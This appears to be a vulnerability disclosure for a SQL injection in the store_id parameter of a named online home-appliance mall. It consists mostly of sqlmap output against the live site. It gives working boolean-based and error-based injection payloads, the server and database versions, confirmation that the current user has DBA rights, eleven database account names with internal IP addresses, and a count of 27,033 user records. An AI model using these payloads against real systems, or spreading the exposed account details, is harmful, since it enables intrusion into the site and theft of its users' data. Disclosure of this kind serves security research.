SQL injection vulnerability in 慧聪家电城 (Huicong Home Appliance Mall), involving 27033 user records

Vulnerable URL: https://www.hcjdc.com/pop_shop.php?act=show_store&store_id=200%27%3B

Injection point: store_id


 

sqlmap identified the following injection point(s) with a total of 366 HTTP(s) requests:
---
Parameter: store_id (GET)
    Type: boolean-based blind
    Title: OR boolean-based blind - WHERE or HAVING clause (MySQL comment)
    Payload: act=show_store&store_id=-6061 OR 1964=1964#

    Type: error-based
    Title: MySQL OR error-based - WHERE or HAVING clause
    Payload: act=show_store&store_id=-7338 OR 1 GROUP BY CONCAT(0x716a626a71,(SELECT (CASE WHEN (7737=7737) THEN 1 ELSE 0 END)),0x717a787671,FLOOR(RAND(0)*2)) HAVING MIN(0)#
---
web server operating system: Linux CentOS 6.5
web application technology: PHP 5.3.3, Apache 2.2.15
back-end DBMS: MySQL >= 5.0.0

web server operating system: Linux CentOS 6.5
web application technology: PHP 5.3.3, Apache 2.2.15
back-end DBMS: MySQL 5
current user: '[email protected]'
current database: 'jdmall'
current user is DBA: True

database management system users [11]:
[*] ''@'hcjdc'
[*] ''@'localhost'
[*] 'bj001'@'192.168.50.167'
[*] 'bj001'@'192.168.60.%'
[*] 'bj001'@'192.168.70.250'
[*] 'root'@'127.0.0.1'
[*] 'root'@'hcjdc'
[*] 'root'@'localhost'
[*] 'test2'@'localhost'
[*] 'wangheng2'@'%'
[*] 'wangheng2'@'58.252.73.135'

database management system users password hashes:





Databases and tables:
 




Total rows in the user table: 27033